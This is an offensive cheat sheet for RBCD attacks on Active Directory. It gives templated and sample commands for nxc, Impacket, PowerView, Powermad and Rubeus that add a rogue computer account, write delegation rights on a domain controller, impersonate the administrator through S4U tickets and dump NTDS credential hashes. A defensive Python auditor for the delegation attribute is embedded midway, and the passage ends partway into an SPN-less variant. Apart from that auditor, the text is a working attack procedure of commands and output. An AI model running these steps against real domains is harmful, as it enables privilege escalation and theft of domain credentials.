RBCD Attack
From a Linux host (nxc / Impacket)
1. Check Machine Account Quota [Optional]
# Password
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -M maq
Sample Output:
$ nxc ldap DC01.example.com -u 'apple.seed' -p 'Password123!' -d example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:Password123!
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# NTLM
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -d <DOMAIN> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -H '2B576ACBE6BCFDA7294D6BD18041B8FE' -d example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:2B576ACBE6BCFDA7294D6BD18041B8FE
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# Password-based Kerberos
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k --kdcHost <DC> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -p 'Password123!' -d example.com -k --kdcHost dc01.example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:Password123!
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# NTLM-based Kerberos
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -d <DOMAIN> -k --kdcHost <DC> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -H '2B576ACBE6BCFDA7294D6BD18041B8FE' -d example.com -k --kdcHost dc01.example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:2B576ACBE6BCFDA7294D6BD18041B8FE
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# Ticket-based Kerberos
nxc ldap <TARGET> -u '<USER>' -d <DOMAIN> -k --use-kcache --kdcHost <DC> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -d example.com -k --use-kcache --kdcHost dc01.example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
2. Create a Fake Computer [Optional]
# Password
impacket-addcomputer '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed:Password123!' -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# NTLM
impacket-addcomputer '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# Password-based Kerberos
impacket-addcomputer '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed:Password123!' -k -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# NTLM-based Kerberos
impacket-addcomputer '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# Ticket-based Kerberos
impacket-addcomputer '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed' -k -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
3. Get Service Principal Name (SPN) [Optional]
# Password
impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web:Password123!' -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName     Name            MemberOf PasswordLastSet            LastLogon                  Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com   svc_web                   2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# NTLM
impacket-GetUserSPNs '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName     Name            MemberOf PasswordLastSet            LastLogon                  Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com   svc_web                   2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# Password-based Kerberos
impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web:Password123!' -k -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName     Name            MemberOf PasswordLastSet            LastLogon                  Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com   svc_web                   2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# NTLM-based Kerberos
impacket-GetUserSPNs '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName     Name            MemberOf PasswordLastSet            LastLogon                  Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com   svc_web                   2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# Ticket-based Kerberos
impacket-GetUserSPNs '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web' -k -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName     Name            MemberOf PasswordLastSet            LastLogon                  Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com   svc_web                   2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
4. RBCD Attack [Control over an Account with SPN]
# Password
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# NTLM
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Password-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -k -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# NTLM-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Ticket-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -k -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
Note: The -delegate-from account must have an SPN; it does not have to be a computer account.
Note: Drop the trailing $ from -delegate-from when the account is not a machine account.
5. Impersonate
# Password
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>:<COMPUTER_PASSWORD>' -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer:Password123!' -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>' -hashes :<HASH> -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>:<COMPUTER_PASSWORD>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer:Password123!' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>' -hashes :<HASH> -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
6. Secrets Dump
# Pass-the-ticket
export KRB5CCNAME='<CCACHE>'
Sample Output:
$ export KRB5CCNAME='administrator@cifs_dc.example.com@EXAMPLE.COM.ccache'
# Ticket-based Kerberos
impacket-secretsdump <TARGET_USER>@<TARGET> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
From a Windows host (PowerView / Powermad / Rubeus)
1. Import Modules
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> . .\PowerView.ps1
. .\Powermad.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> . .\Powermad.ps1
Ref: Powermad.ps1
2. Check Machine Account Quota
Get-DomainObject -Identity 'DC=<EXAMPLE>,DC=<COM>' | select ms-ds-machineaccountquota
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> Get-DomainObject -Identity 'DC=EXAMPLE,DC=COM' | select ms-ds-machineaccountquota
ms-ds-machineaccountquota
-------------------------
10
3. Create New Computer Account
New-MachineAccount -MachineAccount <COMPUTER> -Password $(ConvertTo-SecureString '<COMPUTER_PASSWORD>' -AsPlainText -Force)
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> New-MachineAccount -MachineAccount EvilComputer -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
[+] Machine account EvilComputer added
4. RBCD Attack
$fakesid = Get-DomainComputer <COMPUTER> | select -expand objectsid
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $fakesid = Get-DomainComputer EvilComputer | select -expand objectsid
$fakesid
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $fakesid
S-1-5-21-3542429192-2036945976-3483670807-11601
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <TARGET_COMPUTER> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
5. Check that the SecurityIdentifier Is Now $fakesid
$RawBytes = Get-DomainComputer <TARGET_COMPUTER> -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $Descriptor.DiscretionaryAcl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-3542429192-2036945976-3483670807-11601
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
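Added audit example, not part of this cheat sheet nor of PowerView or Impacket: the Python below decodes the attribute in both forms seen above. It computes the access mask from the SDDL rights string used in step 4 (which should equal the AccessMask 983551 printed in step 5) and walks the binary descriptor read back in step 5 to list the SIDs allowed to act on behalf of the computer, so a defender can compare them against an approved list. The sample SID and SDDL are the ones shown on this page; all function names are my own.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity for RBCD auditing.

Handles both the SDDL string written in step 4 (O:BAD:(A;;...;;;SID)) and
the binary SECURITY_DESCRIPTOR_RELATIVE read back in step 5, and lists the
SIDs that hold an ACCESS_ALLOWED ACE, i.e. the principals that may obtain
S4U2Proxy tickets to the computer. Owner/group are omitted when building.
"""
import re
import struct

# SDDL access-right abbreviations (standard Windows values, see [MS-DTYP]).
SDDL_RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,                          # DS rights
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,   # standard rights
}
ACE_TYPES = {"A": 0x00, "D": 0x01}  # ACCESS_ALLOWED / ACCESS_DENIED (plain ACEs)
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000

# Constructed sample: the SDDL from step 4 with the SID shown on this page.
SAMPLE_SID = "S-1-5-21-3542429192-2036945976-3483670807-11601"
SAMPLE_SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;%s)" % SAMPLE_SID


def sddl_rights_to_mask(rights):
    """Turn a rights string such as 'CCDCLCSWRPWPDTLOCRSDRCWDWO' into an access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError("malformed rights string %r" % rights)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask


def parse_sddl_dacl(sddl):
    """Return [(ace_type, mask, sid)] for the ACEs in the D: part of an SDDL string.
    Assumes no SACL (S:) part follows the DACL, as in the string used above."""
    if "D:" not in sddl:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", sddl[sddl.index("D:") + 2:]):
        ace_type, _flags, rights, _obj, _inherit, sid = body.split(";")
        aces.append((ACE_TYPES[ace_type], sddl_rights_to_mask(rights), sid))
    return aces


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' as a binary SID (revision, count, authority, subauthorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("bad SID %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off):
    """Decode a binary SID at buf[off:], returning (sid_string, byte_length)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_binary_sd(sddl):
    """Serialise the DACL of an SDDL string as a self-relative security descriptor,
    the byte form that is actually stored in the attribute."""
    entries = parse_sddl_dacl(sddl)
    aces = b""
    for ace_type, mask, sid in entries:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ace_type, 0, 8 + len(sid_b), mask) + sid_b  # ACE header, mask, SID
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(entries), 0) + aces     # ACL header, revision 2
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl  # owner, group and SACL offsets are 0 (absent); DACL follows the 20-byte header


def parse_binary_sd(data):
    """Return [(ace_type, mask, sid)] from the DACL of a self-relative security descriptor."""
    revision, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", data, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []  # header says there is no DACL: nothing to enumerate
    _rev, _sbz, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", data, dacl_off)
    off, aces = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", data, off)
        if ace_type in (0x00, 0x01):  # plain allow/deny ACEs: mask then SID
            mask, = struct.unpack_from("<I", data, off + 4)
            aces.append((ace_type, mask, sid_from_bytes(data, off + 8)[0]))
        off += ace_size  # object ACEs and other types are skipped by their size
    return aces


def allowed_to_act(sd_bytes):
    """SIDs granted an ACCESS_ALLOWED ACE: the principals allowed to act on behalf of the computer."""
    return [sid for ace_type, _mask, sid in parse_binary_sd(sd_bytes) if ace_type == 0x00]


def audit_rbcd(sd_bytes, approved_sids):
    """Return allowed SIDs that are not on the approved list (candidates for RBCD abuse)."""
    return sorted(set(allowed_to_act(sd_bytes)) - set(approved_sids))


if __name__ == "__main__":
    raw = build_binary_sd(SAMPLE_SDDL)  # stands in for the bytes read from the DC
    for ace_type, mask, sid in parse_binary_sd(raw):
        print("AceType=%d AccessMask=%d (0x%X) SecurityIdentifier=%s" % (ace_type, mask, mask, sid))
    print("not approved:", audit_rbcd(raw, approved_sids=[]))
```

In production the raw bytes come from the directory (the `$RawBytes` of step 5 or an LDAP search), not from `build_binary_sd`; the attribute being non-empty on a domain controller is itself worth an alert.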
6. Impersonate
# Calculate NTLM
.\rubeus.exe hash /password:'<COMPUTER_PASSWORD>' /user:<COMPUTER> /domain:<DOMAIN>
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> .\rubeus.exe hash /password:'Password123!' /user:EvilComputer /domain:example.com
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Password123!
[*] Input username : EvilComputer
[*] Input domain : example.com
[*] Salt : EXAMPLE.COMEvilComputer
[*] rc4_hmac : B9E0CFCEAF6D077970306A2FD88A7C0A
[*] aes128_cts_hmac_sha1 : FE834E7490537D833B4FBB0C215BEDB3
[*] aes256_cts_hmac_sha1 : D105000C879775D1727D9E56EF0CA48FD2996B9370165832BB1C5A265922B359
[*] des_cbc_md5 : DAE66B133454FDB5
# Impersonate
.\rubeus.exe s4u /user:'<COMPUTER>$' /rc4:<HASH> /impersonateuser:<TARGET_USER> /msdsspn:<SPN> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> .\rubeus.exe s4u /user:'EvilComputer$' /rc4:B9E0CFCEAF6D077970306A2FD88A7C0A /impersonateuser:administrator /msdsspn:cifs/dc.example.com /ptt /nowrap
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: B9E0CFCEAF6D077970306A2FD88A7C0A
[*] Building AS-REQ (w/ preauth) for: 'example.com\EvilComputer$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFuDCCBb ---[SNIP]--- VyLmh0Yg==
[*] Action: S4U
[*] Building S4U2self request for: 'EvilComputer$@EXAMPLE.COM'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'EvilComputer$@EXAMPLE.COM'
[*] base64(ticket.kirbi):
doIGCjCCBg ---[SNIP]--- 1wdXRlciQ=
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.example.com'
[*] Building S4U2proxy request for service: 'cifs/dc.example.com'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.example.com':
doIGujCCBr ---[SNIP]--- VyLmh0Yg==
[+] Ticket successfully imported!
7. Convert to ccache Format
python3 rubeustoccache.py '<BASE64_TICKET>' <TARGET_USER>.kirbi <TARGET_USER>.ccache
Sample Output:
$ python3 rubeustoccache.py 'doIGujCCBr ---[SNIP]--- VyLmh0Yg==' secrets.kirbi secrets.ccache
By Solomon Sklash
github.com/SolomonSklash
Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to secrets.kirbi
[*] Writing converted .ccache file to secrets.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=secrets.ccache
Ref: RubeusToCcache
8. Secrets Dump
# Pass-the-ticket
export KRB5CCNAME=<TARGET_USER>.ccache
Sample Output:
$ export KRB5CCNAME=secrets.ccache
# Ticket-based Kerberos
impacket-secretsdump <TARGET_USER>@<TARGET> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
SPN-Less RBCD Attack
1. RBCD
# Password
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
